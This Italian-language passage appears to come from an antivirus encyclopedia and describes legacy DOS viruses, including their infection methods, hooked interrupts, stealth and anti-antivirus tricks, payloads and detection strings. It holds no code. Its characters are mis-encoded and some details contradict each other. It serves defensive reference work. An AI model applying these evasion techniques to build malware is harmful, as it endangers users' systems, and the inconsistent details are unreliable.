estensione *.EXE. Tipo di memoria: Non Residente, Direct Infector Condizioni d'attivazione: Controlla la data di sistema. In caso sia il 13 del mese, si nomina N-XERAM. Altrimenti, , si nomina semplicemente come XERAM. Vettore PC agganciato: Int 21h Metodo di infezione: Infetta direttamente i file con estensione *.COM ed *.EXE quando viene eseguito un file infetto. Copia il codice virale nel programma ospite, aggiungendo circa 648 Byte. Carica il virus prima di eseguire il programma ospite. Note: Il virus inizialmente cerca un file con estensione *.COM. Dapprima individua ed infetta il COMMAND.COM, e lo infetta. Dopo aver infettato il COMMAND.COM, il virus ricerca un file con estensione *.EXE. Non cerca un file con estensione *.COM nuovamente. Ricerca solo i file con estensione *.EXE. Dapprima acquisisce la data di sistema per paragonare il giorno (per stabilire il nome), quindi regola il DTA. Il virus poi ricerca un file con estensione *.EXE intercettando l'Int 21 (4E). Quando la ricerca ha successo, il virus acquisisce gli attributi del file utilizzando l'Int 21 (43). Cambia i suoi attributi per permettere la funzione di scrittura, (specialmente per il COMMAND.COM). Prende nota di data ed ora del file utilizzando l'Int 21 (51) cos∞ che quando ha finito di alterare i codice, pu≥ salvarlo usando ora e data del file originale. Questo quindi, inganna l'utente sembrando che il file non sia mai stato cambiato. Dopo il cambiamento, il virus si protegge dai seguenti programmi anti-virus, cancellandoli utilizzando l'Int 21 (41): 1. /NCDTREE/NAV_._NO 2. /CHKLIST.MS 3. /SCANVAL.VAL Questi file sono informazioni o dati usati dai rispettivi programmi anti-virus. Possiamo classificare questo virus come un virus anti-anti-virus. Ogni volta che viene eseguito un file infetto, viene infettato un file con estensione *.EXE nella stessa directory. Danni: 1) Aumenta la lunghezza dei file, aggiunge circa 1667-1678 Byte. 2) Altera il COMMAND.COM, rendendolo inutilizzabile. Aggiunge 1674 Byte. I file infetti con estensione *.EXE girano normalmente. Sintomi: Rallenta l'esecuzione dei programmi. [Despro11] Tipo di Virus: polimorfico, Virus da file Lunghezza del Virus: 2,406-2,409 Byte Virus Infect Type: I file con estensione *.COM ed *.EXE Tipo di reinfezione: no Tipo di memoria: Residente in memoria alta Luogo d'origine: Vettore PC agganciato: INT 21h, INT 24h Metodo di infezione: Il virus infetta i file con estensione *.COM ed *.EXE. Aumenta la lunghezza dei file infetti di 2,406 Byte per i file con estensione *.COM e 2,409 per i file con estensione *.EXE. Il virus infetta il file ospite aggiungendosi alla fine del file. Il virus pu≥ diventare residente in memoria caricando od eseguendo un file infetto con estensione *.COM o *.EXE. Come virus polimorfico, dapprima decripta il proprio codice, poi il virus alloca spazio nella memoria partendo da 9E80:0000. Poi copia il suo codice per rimanere residente. Una volta residente, intercetta l'INT 21H per indirizzare il proprio programma nella memoria alta in 9E80:01BC. Il virus utilizza questo interrupt per essere in grado di aggiungersi ai file caricati ed eseguiti, usando il servizio 4BH dell'interrupt. Durante l'infezione dapprima intercetta l'INT 24H (Critical Error Handler) per disabilitare i messaggi d'errore, in modo che l'infezione non risulti evidente. Quindi cerca il COMMAND.COM nella directory principale del disco in uso e lo infetta se non Φ giα stato infettato. In questo modo dopo il successivo avvio dello stesso drive, il virus, immediatamente residente in memoria, infetta i file eseguibili che vengono caricati in memoria. Infine infetterα il file in uso che Φ stato caricato in memoria. Il virus alcune volte non riesce ad aggiungersi completamente al file, ci≥ lo corrompe solamente. Non esistono attivazione e procedura d'avvio. Danni: Altera il COMMAND.COM ed i file eseguibili che possono causare un blocco del sistema. Sintomi: Aumenta la misura dei file con estensione *.COM di 2,409 Byte e 2,406 Byte i file con estensione *.EXE. [Neuroquila] Pseudonimo: Luogo d'origine: Lunghezza del virus: 4622 Byte Tipo di Virus: Virus da file, Virus criptato Note: Il virus NEUROQUI decripta una parte del proprio codice all'inizio della propria esecuzione ( 4622 Byte). Quindi lo copia nell'area OS 0000:7C00. Poi intercetta l'INT 1. [Keypress-6] Tipo di Virus : Virus da file Tipo di memoria : Memoria alta Vettore PC agganciato : Int 21h, Int 1Ch Metodo di infezione: 1) Salva i valori di tutti i registri. 2) Si carica nella memoria alta, 9FA3:100 caricando 1216 Byte. 4) Intercetta l'Int 21h e l'Int 1Ch (Timer Tick Interrupt), imposta un valore, quindi ritorna ai valori originali dei registri. [Screaming_Fist] Pseudonimo: SFIST696 Tipo di Virus: Virus da file Lunghezza del Virus: Circa 675 Byte (sposta 696 Byte alla memoria) Tipo di memoria: Memoria alta Luogo d'origine: Vettore PC agganciato: Int 21h Metodo di infezione: 1) Si carica in memoria alta, caricando circa 2,048 (9F80:0000) Byte. 2) Infetta i file con estensione *.EXE e *.COM. Copia il codice virale nel programma ospite, aggiungendo circa 696 (02B8H) Byte. Carica il virus prima di far girare il programma ospite. 3) Mentre in memoria, il virus infetta tutti i file con estensione *.COM ed EXE eseguiti. Il codice virale Φ decriptato. Il virus reagisce normalmente inserendo spazio nella memoria prima di infettare i file. Non avviene niente di strano. Aggiunge il proprio codice al programma ospite dopo che Φ stato caricato in memoria. Sintomi: 1) Diminuisce la memoria libera. 2) Aumenta la lunghezza dei file. 3) Pu≥ mostrare il messaggio: "Screaming Fist IIV" contenuto nel codice decriptato. Stringa di rilevamento: "C:\COMMAND>COM.Screaming Fist IIV" Metodo di rilevazione: Il codice del virus decifrato, quindi ricercare le stringhe sopra riportate. [PH33R.1332-1] Pseudonimo: Lunghezza del virus : 1332 Byte Sintomi : Porta la lunghezza dei file con estensione *.EXE, *.COM, e *.DLL ad una lunghezza di 1332 Byte e diminuisce di 2672 la memoria disponibile. Quando un floppy Φ protetto da scrittura, mostra il messaggio "Write Protect Error" quando si tenta di leggerlo. Note: Durante la prima infezione, questo virus individua 2672 Byte nella memoria alta e vi trasferisce 1332 Byte del suo codice. Quindi intercetta l'INT 21 con la procedura di infezione al servizio 4B (Execute Program), 6C (Extended Open Create), 56 (Rename File), e 43 (Get File Attributes). Il virus infetta tutti i file con estensione *.EXE, *.COM, *.DLL che vengono aperti, rinominati, o eseguiti. Inoltre evita di infettare i file che finiscono con la stringa "AV" (NAV, TBAV), "AN" (PCSCAN, SCAN) e "DV". Il virus Φ cos∞ chiamato a causa della stringa "PH33R" trovata nel suo codice. [Changsha] Tipo di Virus: Parassita, Virus da file (File con estensione *.EXE e *.COM) Lunghezza del Virus: 3,072-3,091 Byte Condizioni d'attivazione: Domenica Tipo di reinfezione: no Data di rilevazione.: 1991 Tipo di memoria: Residente in memoria, MCB Luogo d'origine: Changsha, Cina Vettore PC agganciato: INT 8h, INT 13h, INT 21h Metodo di infezione: Il virus infetta i file con estensione *.EXE ed *.EXE. Aumenta la lunghezza dei file con estensione *.COM di 3,072 Byte e di 3,091i file con estensione *.EXE, aggiungendosi alla fine del file. Il virus mette residente in memoria il proprio codice nella memoria bassa dopo i programmi DOS. Il codice del virus si carica in memoria caricando, eseguendo, copiando un file infetto.. Mentre residente in memoria pu≥ infettare file facendo la stessa cosa. Intercetta l' INT 21H per inserire i valori del proprio programma nella memoria bassa in 17F8:01C0. Ci≥ permette al virus di aggiungersi in fondo al file. Intercetta anche l'INT 8H (cambiato a 17F8:02E1) e l'INT 13H (cambiato a 17F8:0BED) ma nessuna procedura Φ stata vista. Intercettando l'INT 21H acquisisce la data di sistema e se il giorno corrente Φ Domenica, si carica ed infetta tutti i file eseguibili nella cartella in uso. E' stato notato che data ed ora dei file infetti sono impostati su 1-1-94 all'ora 1:15. I file infettati questo giorno sono alterati e non girano correttamente. Ogni Domenica il virus si replica nel file. Se identificato da DOS CHKDSK.EXE la memoria occupata dal virus Φ 3,344 Byte. La seguente stringa pu≥ essere trovata nel codice virale: "Auto-Copy Deluxe R3.00" "(C) Copyright 1991. Mr YaQi. Changsha China" "No one can Beyond me!" Danni: Corrompe i file con estensione *.EXE e *.COM Sintomi: 1) Aumento di lunghezza dei file di 3,072-3,091 Byte. 2) Imposta data ed ora di sistema su 1-1-94, 1:15. [Chao.1241] Tipo di Virus: Parassita, Virus da file (File con estensione *.EXE e *.COM) Lunghezza del Virus: 1,241-1,247 Byte Nome originale: CHAOS Tipo di reinfezione: no Tipo di memoria: Residente in memoria, MCB Luogo d'origine: Vettore PC agganciato: INT 21h, INT 13h, INT 24h Metodo di infezione: Il virus infetta i file con estensione *.EXE e *.COM Si carica in memoria eseguendo o caricando un file infetto. Aumenta la misura di un file infetto di 1,241 Byte per i file con estensione *.COM e 1,247 Byte per i file con estensione *.EXE. Il virus mette residente in memoria il proprio codice nella memoria bassa dopo i programmi DOS. Intercetta l'INT 21H per inserire i valori del proprio programma nella memoria bassa in 1808:020E per essere in grado di aggiungersi ai file eseguiti usando il servizio 4BH dell'interrupt. Intercetta anche l'INT 24H (Critical Error Handler) per disabilitare il messaggio d'errore in caso di un errore di scrittura del file ospite. Caricato in memoria controlla la data corrente. Se Φ il 13 Settembre Φ attivata la procedura. Possono essere trovate le seguenti date di avvio: Ogni giorno 9 del 1997 " 10th " " 1998 " 11th " " 1999 .... e cos∞ via. La seguente formula descrive come determinare la data di attivazione per l'anno in corso: Giorno di attivazione = Anno corrente - 1988 La procedura eseguita dal virus durante la data di attivazione blocca il sistema dopo aver caricato ed eseguito i file. Pulisce lo schermo e mostra il seguente messaggio "I see, I come, I conquer...Trojan horse - CHAOS v2.0 by Faust". Se identificato da DOS CHKDSK.EXE la memoria occupata dal virus Φ 1840 Byte. Danni: Blocca il sistema Sintomi: I file infetti incrementano le loro dimensioni di 1,241 (*.COM) e 1,247 Byte(*.EXE). [Chill] Tipo di Virus: polimorfico, Virus da file (File con estensione *.COM) Lunghezza del Virus: 544 Byte Tipo di reinfezione: no Tipo di memoria: Residente in memoria alta Vettore PC agganciato: INT 21h Metodo di infezione: Il virus infetta solo i file con estensione *.COM. La misura dei file infetti aumenta di 544 Byte. Il virus infetta il file ospite aggiungendosi alla fine del file. Come virus polimorfico, dapprima decripta i suoi primi 544 Byte facendo un XOR con il valore di registro 6Ah di ogni Byte. Poi il virus sistema 1200 Byte nella memoria alta (9FB4:0000) e copia il proprio codice per rimanere residente. Poi intercetta l'INT 21H per inserire i vettori del proprio programma nella memoria alta (9FB4:00B9). Il virus diventa residente in memoria dopo aver eseguito o caricato un file infetto. Una volta residente in memoria infetta i file con estensione *.COM quando caricato od eseguito in quanto utilizza il servizio alterato 4BH dell'INT 21H che per prima cosa il codice del virus nel file ospite prima di assumere il controllo dell'ospite. Inoltre imposta gli attributi della data del file infetto a 01-01-94. Danni: Nessuno Sintomi: La lunghezza del file ospite aumenta di 544 Byte. [Three_Tunes] Lunghezza del Virus: Circa 1784 Byte Tipo di reinfezione: Non reinfetta, la misura dei file infetti Φ consistente Tipo di memoria: Memoria alta Vettore PC agganciato: Int 21h, Int 1Ch Metodo di infezione: 1) Si carica in memoria alta, allocando 2304 Byte (9F70:0000). 2) Infetta i file con estensione *.EXE. Copia il codice virale nel programma ospite aggiungendo circa 1784 Byte. Prima di eseguire il programma carica il virus Mentre residente in memoria, il virus infetta ogni file con estensione *.EXE eseguito. Non fa nulla di speciale. Si replica quando residente in memoria. Infetta solo i file eseguiti. Danni: 1) Diminuisce la memoria libera di circa 2304 Byte. 2) Aumenta la lunghezza dei file. Aggiunge circa 1784 Byte. Note: Il virus controlla che il mese corrente sia Giugno intercettando l'Int 21 (2A). Se "SI", il virus si attiva; altrimenti esce dal programma. Poi, il virus controlla l'ora di sistema usando l'INT 21 (2C). Utilizza una formula speciale che Φ usata per selezionare quale procedura utilizzare. Ci sono 4 possibili procedura che discuteremo dopo. Ma prima, la formula: Int 21 (2C): Significant register CX, Adds CH to CL and returns the sum to CL (Add CL,CH) uses the AND boolean between CL,03 (And CL,03) clears CH to 00 (XOR CH,CH) compares Cl to 4 possibilities (CMP CL,+03) Il virus usa questa procedura per acquisire 00, 01, 02, 03 come valori per CL. Ogni valore corrisponde a una certa melodia. (03 non ha una canzone da suonare) Quando Φ in esecuzione il file infetto, una specifica melodia corrisponde ed ci≥ che ne risulta dopo la manipolazione del tempo viene suonato. Vengono suonati un totale di tre canzoni. Qualsiasi canzone sia suonata, l'infezione rimane la stessa, anche se non viene suonato niente. Sintomi: 1) Ritarda l'esecuzione dei programmi. 2) Suona diverse canzoni. [Phx.96S] Pseudonimo: Lunghezza del virus: 965-968 Byte Tipo di Virus: Sintomi: I file infetti con estensione *.COM ed *.EXE aumenta di 965-968 Byte e diminuisce di 1024 Byte la memoria disponibile. Quando un floppy Φ protetto da scrittura, normalmente mostra un messaggio "Write Protect Error" quando si fa un tentativo di leggerlo. Note: Durante la prima infezione, questo virus individua 1024 Byte nella memoria alta e trasferisce 965 Byte del suo codice in questa area. Quindi intercetta INT 21. Questo virus file infetti con estensione *.COM ed *.EXE che vengono aperti, rinominati od eseguiti. Il virus ha questo nome per la stringa "PHX" nel proprio codice. [HI.460] Tipo di Virus: Virus da file (File con estensione *.EXE) Tipo di memoria: Memoria alta Vettore PC agganciato: Int 21h Metodo di infezione: 1) Controlla che il valore archiviato in DS:[0164] sia 2ED3h (se 2ED3h non Φ spostato da questo indirizzo). 2) Si carica in memoria alta all'indirizzo 9FC0:0h. 3) Intercetta l'interrupt 21h, e lo imposta. Una volta in memoria il virus aspetta un File con estensione *.EXE da essere eseguito per infettarlo. La parola "Hi" pu≥ essere trovata nel codice del virus per ogni file con estensione *.EXE infettato. [Liberty.2857.A] Tipo di Virus: Virus da file Pseudonimo: Lunghezza del Virus: Luogo d'origine: Tipo di memoria: Memoria alta Vettore PC agganciato: Int 21h Metodo di infezione: 1) Si carica da 11B0:0110 a 9DEE:0110h, con 2858 Byte. 2) Cripta i dati da 11B0:[0115] con un valore di CX = 3Ch. Si pu≥ trovare in "LIBERTY" ma dopo averlo criptato, i dati a questo indirizzo diventano "Me BC.". 3) Cripta nuovamente il messaggio da 11B0:0113h a 114C:0100he mostra: "- M Y S T I C - COPYRIGHT (c) 1989-2000, by SsAsMsUsEsL" 4) Dopo che Φ stato caricato in memoria alta, aspetta di eseguire un file con estensione *.EXE o *.COM e lo infetta. [Sibylle.853] Tipo di Virus: Virus da file Lunghezza del Virus: Circa 867 Byte Tipo di memoria: Memoria alta Luogo d'origine: Condizioni d'attivazione: Si attiva solo se il milionesimo di secondo Φ minore di 32, quindi il codice esce senza essersi caricato in memoria. Vettore PC agganciato: Int 21h, Int 2Fh Metodo di infezione: 1) Si carica in memoria alta, inserendo 928 Byte (usando MEM). 2) Sposta 904 (01C4H x 2) Byte nella memoria alta. 3)Infetta i file con estensione *.EXE. Copia il codice del virus nel programma ospite, aggiungendo circa 867 Byte. Carica il virus prima di eseguire il programma ospite. Mentre residente in memoria, il virus infetta ogni file con estensione *.EXE eseguito. Non fa nulla di speciale. Si replica quando residente in memoria. Infetta solo i file eseguiti. Danni: 1) Diminuisce la memoria libera di circa 928 Byte. Usando MEM.EXE, 928 Byte saranno usati da MSDOS (tricky). 2) Aumenta la lunghezza dei file. Aggiunge circa 867 Byte. Sintomi: Rallenta l'esecuzione dei programmi. Metodo di rilevazione: Individuare la stringa. [Fich-1] Tipo di Virus: Virus da file [File con estensione *.COM (compreso il COMMAND.COM)] Tipo di memoria: MCB Vettore PC agganciato: Int 21h Metodo di infezione: Il virus Φ un programma TSR. Infetta immediatamente COMMAND.COM. Quindi aspetta un altro file che deve essere eseguito per infettarlo. Questo virus infetta solo i file con estensione *.COM. Quando viene eseguito un file non infetto, si infetta un altro file con estensione *.COM. Il virus non reinfetta i file. Prima di caricarsi in memoria, controlla che sia giα in memoria. [Hdenowt] Tipo di Virus: Virus da file [File con estensione *.COM e *.EXE (compreso COMMAND.COM)] Vettore PC agganciato: Int 21h Metodo di infezione: 1) Salva i primi 16 Byte all'indirizzo 114C:08D5h e poi cambia i primi 16 Byte di 0:0 da 11BA:0285h. Prima di questo si verifica una criptazione partendo da 11BA:012Eh eseguendo un XOR con 95h, di 288 Byte. 2) Quando Φ eseguito il codice del virus, colloca COMMAND.COM, quindi cerca altri file con estensione *.EXE e *.COM nella stessa directory in cui Φ eseguito il virus. L'infezione non si vede facilmente perchΘ la lunghezza del file rimane invariata. Sintomi: I file infetti incrementano le loro dimensioni di circa 1700 Byte. [Kacz] Luogo d'origine: Lunghezza del virus: 4444 Byte Tipo di Virus: polimorfico, Virus da file Sintomi : I file con estensione *.EXEs aumentano di 4444 Byte e la memoria disponibile diminuisce di 6144 Byte. I file infetti mostrano un messaggio come: "Error Loading Program File", "File not Found", e "Memory Allocation Error." Note: Durante la prima infezione, KACZ decripta 4387 Byte del suo codice quindi colloca 6144 Byte in memoria alta. Trasferisce 4387 Byte del suo codice in quell'area. Intercetta l'INT 13 e l'INT 21. Legge il Boot Record dell'hard disk e cerca di modificarlo. Scrive il nuovo Boot Record infetto nell'hard disk cos∞ ogni volta che viene usato per avviare, il virus risiede in memoria. Questo virus infetta tutti i file con estensione *.EXE che vengono aperti, rinominati o eseguiti. Modifica inoltre il campo dei secondi a 62. Nel codice del virus decriptato si trovano i seguenti messaggi: "Zrobione" "Wersja" "Kodowanie" "Liczmik HD" "K a c z,o r t e s t" [V-BCIV-1] Pseudonimo: VIENREBO Tipo di Virus: Virus da file Lunghezza del Virus: Circa 648 Byte Virus reinfettante: Non reinfetta, la misura dei file infetti Φ costante. Se il file Φ giα alterato cerca un altro file con estensione *.COM. Tipo di memoria: Non residente. Luogo d'origine: Vettore PC agganciato: Int 21h Metodo di infezione: Infetta direttamente i file con estensione *.COM quando viene eseguito un file infetto. Copia il codice del virus nel programma ospite, aggiungendo circa 648 Byte. Carica il virus prima di far girare il programma ospite. In seguito cerca dei file con estensione *.COM nella directory utilizzando l'Int 21 (4E e 4F). Se la ricerca ha successo, il virus acquisisce gli attributi del file utilizzando l'Int 21 (43). Cambia i propri attributi per poter essere in grado di scrivere (soprattutto per COMMAND.COM). Prende nota del file di data ed ora usando l'Int 21 (51), cos∞ pu≥ salvare il file usando data ed ora originali quando altera il codice. In questo modo il file non sembra essere cambiato. Ogni volta che viene eseguito un file infetto, un file con estensione *.COM viene infettato nella stessa directory. Danni: 1) Aumenta la lunghezza dei file. Aggiunge circa 648 Byte. 2) Altera COMMAND.COM, rendendolo inutilizzabile. Altri file con estensione *.COM girano normalmente. Sintomi: Rallentamento dell'esecuzione dei programmi. [Nightfall.4518] Tipo di Virus: Virus da file Note: 1) Decripta una del suo codice di 4526 Byte, quindi lo decripta nuovamente. 2) Controlla che sia giα caricato in memoria controllando i vettori interrupt di INT 13, INT 21 e INT 2A. 3) Colloca 5680 Byte nella memoria alta. Dopo essersi caricato nella memoria alta, il virus sembra non stia facendo niente. E' possibile che il virus abbia dei bug. [Dig.Death.3787] Tipo di Virus: polimorfico, Virus da file (File con estensione *.EXE e *.COM) Lunghezza del Virus: 3547 Byte Virus reinfettante: No Tipo di memoria: Residente in memoria alta Vettore PC agganciato: INT 21h, INT 13h, INT 1Ch Metodo di infezione: Il virus infetta i file con estensione *.COM e *.EXE. Infetta il file ospite attaccandosi alla fine del file. La lunghezza di un file infetto aumenta di 3,547 Byte. Il virus pu≥ risiedere in memoria al caricamento ed esecuzione di un file infetto. Essendo un virus polimorfico, prima decripta 3,422 Byte del suo codice. Quindi colloca 5,120 Byte in memoria alta partendo da 9EB0:0000. Da qui intercetta l'INT 21H. Utilizza il servizio 4BH dell'interrupt per potersi attaccare ad un file caricato ed eseguito. Utilizza inoltre i servizi 4EH e 4FH per nascondere l'aumento di lunghezza dei file infetti dopo che il virus Φ in memoria; in questo modo non si nota l'infezione. Una volta che il virus si Φ attaccato al file ospite, cripta ancora il suo codice e lo scrive in un nuovo file. Non si rilevano procedure o attivazioni. Il virus si replica soltanto. Sintomi: I file infetti incrementano le loro dimensioni di 3,547 Byte. [Vinchuca] Tipo di Virus: Virus da file Lunghezza del Virus: La lunghezza del codice criptato Φ di 912 Byte Tipo di memoria: Memoria alta Luogo d'origine: Vettore PC agganciato: Int 21h, Int 27h Metodo di infezione: 1) Si carica in memoria alta, caricando circa 1328 Byte. 2) Infetta i file con estensione *.COM. Copia il codice del virus nel programma ospite (la lunghezza del codice Φ di 912 Byte). Carica il virus prima di far girare il programma ospite. 3) Mentre Φ in memoria, il virus infetta tutti i file con estensione *.COM che vengono aperti. Il codice del virus viene trasferito in memoria utilizzando l'Int 21 (4A). Il codice del virus viene quindi immediatamente eseguito quando le richieste vengono soddisfatte. Il virus Φ TSR, usando Int 27. Il virus reagisce trasferendo il suo codice in memoria alta prima di aggiungere effettivamente il suo codice. Sintomi: Pu≥ comparire: "Saludos para Satanic Brain y Patoruzi" "Virus Vinchaca v.1,0 1993" "Creado por Murdock." "Buenos Aires, Argentina" "Su PC tiene mal chagas....jajaja...." che Φ presente nel codice del virus. Metodo di rilevazione: Decriptazione del codice del virus prima della rilevazione. Ricerca della suddetta stringa. Note: Il codice del virus contiene Int 13 (16) che esamina le variazioni delle informazioni del disco. [Ginger.2774] Tipo di Virus: Virus da file Tipo di memoria: Tipo OS (dopo riavvio = Mem. alta) Vettore PC agganciato: Int 21h, Int 13h Metodo di infezione: Il virus Φ di tipo OS, intercetta l'Int 13 e 21h. Infetta prima il boot record, cos∞ quando la macchina viene riavviata, il virus si carica in memoria alta da dove infetta i file. Colloca 4096 Byte in memoria. Il problema insorge quando il virus viene eseguito e la macchina viene riavviata, infatti la tastiera non funziona a causa dell'utilizzo dell'Int 15h. Per questo motivo l'infezione non si verifica. [Mirea.1788] Pseudonimo: Luogo d'origine: Lunghezza del virus: 1788 Byte Tipo di Virus: Virus da file (File con estensione *.COM) Sintomi : La lunghezza dei file con estensione *.COM aumenta di 1788 Byte, la memoria disponibile diminuisce di 2368 Byte. Rallenta l'esecuzione dei programmi. Note: Il virus MIRE1788 si colloca prima in memoria con una lunghezza di 2368 Byte e trasferisce il suo codice di 1788 Byte in memoria alta. Controlla quindi che la data sia il giorno 13. Intercetta quindi l'INT 8, INT 9 e INT 21. Questo permette al virus di infettare altri file con estensione *.COM. Se la data Φ il giorno 13, il virus Φ in memoria e la tastiera non viene usata per 30 minuti, il virus mostra una finestra di dialogo rossa al centro dello schermo con il testo ASCII scritto all'interno. Sono leggibili solo il numero 16 e una serie di numeri 133-20-60. Nasconde un file infetto quando viene eseguito il comando DIR al prompt di DOS, in modo da nascondere l'aumento di lunghezza di un file infetto. [Little-Red] Tipo di Virus: Virus da file Lunghezza del Virus: 1465 Byte Condizioni d'attivazione: Anno < 1994, Data = 9 sett., 26 dic. Tipo di memoria: Residente in memoria alta Vettore PC agganciato: INT 1Ch, INT 21h, INT 24h Metodo di infezione: 1) Decripta una parte del suo codice e quindi lo esegue. Quindi disattiva la funzione "Get DOS Version". Il virus utilizza questa funzione per controllare direttamente le risorse di DOS. 2) Cripta ancora questa parte. 3) Modifica la memoria e colloca 2048 Byte in memoria alta. E' quindi pronto per trasferire il codice del virus in HMA con una lunghezza di 1465 Byte. 4) In memoria alta, il virus intercetta l'INT 1C, 21 e 24. 5) Apre i file eseguiti e controlla che siano dei file con estensione *.COM; se "SI", controlla che il file sia giα infetto; se "NO", il virus lo infetta. Dopo l'infezione, il virus cambia l'attributo di ":\COMMAND.COM" da "read-only" e "system" in "archive". [Civil_defense_FB] Tipo di Virus: Boot, Virus da file (File con estensione *.EXE e *.COM) Lunghezza del Virus: 6656 Byte Nome originale: CIVIL DEFENSE Virus reinfettante: no Tipo di memoria: Non risiede in memoria Luogo d'origine: Metodo di infezione: Il virus infetta prima di tutto il settore Master Boot del drive C:\. Legge nel suo programma il settore di boot del drive C:\ ed il settore seguente (testina 0, cilindro 0, settore 2). Quindi legge 1 settore da testina 0, cilindro 87, settore 65 del drive C:\. Il virus regola quanto sopra scritto copiando altri dati dall'originale boot record, e li scrive nel settore di boot del drive C:\; in questo modo sostituisce l'originale. Quindi copia 6656 Byte del proprio codice (13 settori) al settore 66, cilindro 87, testina 0 del drive C:\. Si Φ visto che infetta il file CIV6672.EXE aprendo, copiando la propria header sul file, spostando il file pointer alla fine del file ospite (CIV6672.EXE), eseguendo quindi INT 40H (Write to file). In questo modo viene corrotto il file del programma del virus. Non Φ stato individuato come il settore di boot infetto cariche il suo programma dal settore 66, cilindro 87, testina 0 del drive C:\. Questo potrebbe essere la ragione del perchΘ il settore di boot infetto, non infetti i file caricati ed eseguiti. Non si rileva l'intercettazione dell'interrupt, la sua collocazione in memoria o l'attivazione. Come verificato attraverso DOS CHKDSK, non ci sono variazioni nella memoria dopo il caricamento del virus CIV6672.EXE. Si Φ concluso che il virus infetta il settore di boot facendo girare direttamente il file del programma del virus senza sapere come il virus si replichi in altri file eseguibili che possono infettare il settore Master Boot di drive C:\ al caricamento e all'esecuzione dei file. Sintomi: Rallentamento de tempo di caricamento ed esecuzione del file. [Plagiarist.2051] Pseudonimo: PLAGIARIST Origine: Lunghezza del virus: 2051 Byte Tipo di Virus: Virus Multipartito Sintomi : La lunghezza dei file con estensione *.COM e *.EXE aumenta di 2051 Byte e la memoria disponibile diminuisce di 2048 Byte. Note: Alla prima infezione, il virus controlla che la data sia tra il 1993 ed il 2042. Se "SI", fa una copia del boot record alla fine logica del drive e trasferisce il suo codice dopo il. Sostituisce quindi il boot record corrente con il proprio boot record infetto. Il virus si attiva quando si avvia da un drive infetto. Il virus colloca 2048 Byte in memoria e trasferisce il codice del virus nella memoria alta del disco di. In seguito intercetta l'INT 21, INT 28, INT 08, e l'INT 13. [VLamiX] Tipo di Virus: Virus da file Lunghezza del Virus: Circa 1062 Byte Tipo di memoria: Memoria alta Luogo d'origine: Vettore PC agganciato: Int 21h, Int 10h Metodo di infezione: 1) Si carica in memoria alta, collocando circa 1,136 Byte. 2) Infetta i file con estensione *.EXE. Copia il codice del virus code nel programma ospite, aggiungendo circa 1091-1106 Byte. Carica il virus prima di far girare il programma ospite. 3) Mentre Φ in memoria, il virus infetta tutti i file con estensione *.EXE aperti. Il codice del virus Φ decriptato. Il virus reagisce collocando spazio in memoria prima di infettare i file. Non si verifica nulla di strano in quanto attacca il suo codice al programma ospite. Sintomi: Pu≥ comparire nel codice decriptato il seguente: "Smartc*.cps chklist*" "-=* Die-lamer *=-" "chklist ???" "chklist.cps" "Vlamix-1" Metodo di rilevazione: Decifrazione del codice del virus prima della sua rilevazione. Ricerca della stringa di testo. [Sleepwalker] Tipo di Virus: Virus da file Lunghezza del Virus: Tra 1268-1282 Byte Tipo di memoria: Memoria alta Vettore PC agganciato: Int 21h, Int 1Ch Metodo di infezione: 1) Si carica in memoria alta, collocando circa 1552 Byte. 2) Infetta i file con estensione *.COM. Copia il codice del virus nel programma infetto. Carica il virus prima di far girare il programma ospite. 3) Mentre Φ in memoria, il virus infetta tutti i file con estensione *.COM aperti. Il codice del virus viene trasferito in memoria usando Int 21 (4A). Il virus reagisce trasferendo il suo codice in memoria alta prima di attaccare il codice stesso ad un file. Il virus mostra la stringa "STAC," ma non Φ escluso che possano comparirne delle altre. Sintomi: Compare nel codice del virus: "STAC" "Sleepwalker. (c) Optus 1993." Metodo di rilevazione: Controllo della suddetta stringa. [Alfon] Nome del Virus: ALFO1344 Tipo di Virus: Virus da file Lunghezza del Virus: 1344-1426 Byte Virus Infect Type: File con estensione *.EXE e *.COM Virus reinfettante: No Tipo di memoria: Risiede in memoria, tipo MCB Vettore PC agganciato: INT 21h Metodo di infezione: The virus infetta i file con estensione *.EXE e *.COM. Infetta i file con estensione *.COM spostando pi∙ in basso il programma ospite ed attaccando l'intero programma del virus all'inizio del file. Nell'infezione dei file con estensione *.EXE invece, il programma del virus viene aggiunto normalmente oppure alla fine del programma ospite. Dopo l'infezione, la lunghezza del file del programma ospite aumenta di 1344 Byte per i file con estensione *.EXE e 1426 Byte per i file con estensione *.COM. Il virus controlla che un file sia giα stato infettato. Se "SI", lascia indietro il file. Se "NO", lo infetta collocando memoria dopo la parte residente di COMMAND.COM e copiando il suo programma in quella posizione. Intercetta l'INT 21H cambiando il vettore al suo programma in 17F8:01CF. All'esecuzione del servizio dell'interrupt 4BH, aggiunge il proprio programma attraverso l'INT 3H che contiene gli originali vettori dell'INT 21H. Successivamente ritorna al suo programma residente in memoria a 17F7:0000 per infettare altri file caricati o eseguiti. Sintomi: Aumento della lunghezza dei file di 1344 Byte (per quelli con estensione *.EXE) e 1426 Byte (per i file con estensione *.COM). [HLLO.Beeper] Tipo di Virus: Virus da file (File con estensione *.EXE) Modalitα di reinfezione: Non residente in memoria Vettore PC agganciato: Metodo di infezione: Quando viene eseguito un file infetto, tre file con estensione *.EXE si infettano, copiando il loro nome e cambiando la propria estensione in *.COM. Per ogni file infettato alla propria esecuzione, tre file con estensione *.EXE divengono infetti. Questo permette al codice del virus di venire eseguito prima dei file con estensione *.EXE originali. [One_Half.3544] Virus Status: Origine: Lunghezza del virus: 3500-5500 Byte Tipo di Virus: Virus Polimorfico Sintomi : La lunghezza dei file con estensione *.COM e *.EXE infetti aumenta di 3544 Byte e la memoria disponibile diminuisce di 5120 Byte. A causa della procedura del virus, i programmi eseguiti possono rallentare. Note: One-half Φ un virus multipartito e polimorfico. Prima infetta il settore di boot dell'hard disk e rimane in memoria solo se l'hard disk Φ usato per l'avvio. Durante questa procedura, colloca 5120 Byte in memoria e rimane in memoria alta. Intercetta l'INT 21, INT 13, e INT 1C. Tutti i file con estensione *.EXE e *.COM eseguiti, aperti o copiati vengono infettati dal virus. La loro lunghezza aumenta di 3544 Byte. Il virus Φ in grado di nascondersi da un software anti-virus. Riesce anche a nascondere l'aumento di lunghezza dei file aggiungendo dei codici speciali in grado di controllare i file infetti e modificare la loro lunghezza quando vengono visti. One-Half cripta un area dell'hard disk ogni volta che viene fatto partire. Ci≥ significa che lentamente cripta tutti i dati nell'hard disk. Malgrado queste aree vengano poi decriptate quando il virus Φ in memoria, Φ opportuno eseguire una copia di backup di un file importante mentre il virus Φ ancora in memoria. Questo rende difficile la sua rimozione perchΘ nasconde il suo codice criptato nel Boot Record. Nel codice del virus 